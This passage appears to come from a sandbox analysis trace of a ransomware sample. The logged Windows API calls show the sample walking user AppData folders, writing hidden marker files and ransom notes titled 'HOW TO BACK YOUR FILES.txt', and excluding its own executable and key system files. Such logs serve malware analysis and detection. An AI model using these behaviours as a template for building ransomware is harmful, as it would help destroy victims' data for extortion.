"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.479] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.479] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.479] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.479] CloseHandle (hObject=0x27c) returned 1 [0066.479] CloseHandle (hObject=0x228) returned 1 [0066.480] GetCurrentThreadId () returned 0xd98 [0066.480] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0066.480] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies" [0066.480] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125828 | out: hHeap=0xe0000) returned 1 [0066.480] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0066.480] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies" [0066.480] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies\\" [0066.480] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0066.480] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.481] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.483] FlushFileBuffers (hFile=0x228) returned 1 [0066.498] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.498] CloseHandle (hObject=0x228) returned 1 [0066.499] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies") returned 111 [0066.499] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.499] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0f3c576, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0066.499] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.499] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.499] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.499] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.499] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0f3c576, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.499] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.499] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.499] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.499] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.499] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.499] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0f3c576, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0f3c576, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0f3c576, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.499] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.499] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.499] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0f3c576, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0f3c576, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0f3c576, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.499] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0066.499] lstrcpyW (in: lpString1=0x130ec18, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.500] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.500] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.500] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.500] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.501] CloseHandle (hObject=0x27c) returned 1 [0066.501] CloseHandle (hObject=0x228) returned 1 [0066.501] GetCurrentThreadId () returned 0xd98 [0066.501] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0066.501] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache" [0066.501] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x126138 | out: hHeap=0xe0000) returned 1 [0066.501] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0066.501] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache" [0066.501] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache\\" [0066.501] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0066.501] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.502] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.504] FlushFileBuffers (hFile=0x228) returned 1 [0066.505] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.505] CloseHandle (hObject=0x228) returned 1 [0066.506] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache") returned 109 [0066.506] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.506] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0f62693, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.506] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.506] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.506] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.506] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.506] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0f62693, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.506] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.506] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.506] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.506] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.506] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.506] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0f62693, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0f62693, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0f62693, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.506] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.506] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.506] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0f62693, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0f62693, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0f62693, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.506] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.506] lstrcpyW (in: lpString1=0x130ec14, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.506] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.507] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.508] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.508] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.508] CloseHandle (hObject=0x27c) returned 1 [0066.508] CloseHandle (hObject=0x228) returned 1 [0066.508] GetCurrentThreadId () returned 0xd98 [0066.508] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11cf48 [0066.508] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy" [0066.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dc38 | out: hHeap=0xe0000) returned 1 [0066.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cf40 | out: hHeap=0xe0000) returned 1 [0066.508] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy" [0066.508] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\" [0066.508] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0066.508] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.527] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.529] FlushFileBuffers (hFile=0x228) returned 1 [0066.530] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.530] CloseHandle (hObject=0x228) returned 1 [0066.531] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy") returned 95 [0066.531] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.531] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0f886c8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0066.531] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.531] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.531] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.531] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.531] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0f886c8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.531] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.531] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.531] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.531] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.531] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.531] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0f886c8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0f886c8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0fae9d3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.531] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.531] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.531] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b8500e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0066.531] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.531] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.531] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0066.531] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0066.532] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0066.532] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0066.532] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0066.532] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0066.532] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0066.532] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0066.532] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0066.532] lstrcpyW (in: lpString1=0x130ebf8, lpString2="AC" | out: lpString1="AC") returned="AC" [0066.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0066.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116040 [0066.532] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x11d0e8 [0066.532] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b12964, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0066.532] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.532] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 